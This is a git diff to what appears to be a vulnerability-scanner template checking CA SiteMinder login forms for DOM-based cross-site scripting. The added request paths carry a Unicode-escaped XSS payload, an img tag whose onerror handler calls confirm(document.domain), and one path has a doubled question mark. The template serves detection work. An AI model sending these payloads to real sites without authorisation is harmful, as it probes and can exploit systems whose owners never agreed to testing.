diff --git a/DOM-XSS-SiteMinder.yaml b/DOM-XSS-SiteMinder.yaml index 2868f2c..4321cdb 100644 --- a/DOM-XSS-SiteMinder.yaml +++ b/DOM-XSS-SiteMinder.yaml @@ -13,6 +13,8 @@ requests: path: - '{{BaseURL}}/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7' - '{{BaseURL}}/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7' + - '{{BaseURL}}/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm\u0028document.domain\u0029\u0022\u003e&SMAUTHREASON=7' + - '{{BaseURL}}/siteminderagent/forms/smaceauth.fcc??USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm\u0028document.domain\u0029\u0022\u003e&SMAUTHREASON=7' matchers-condition: and matchers: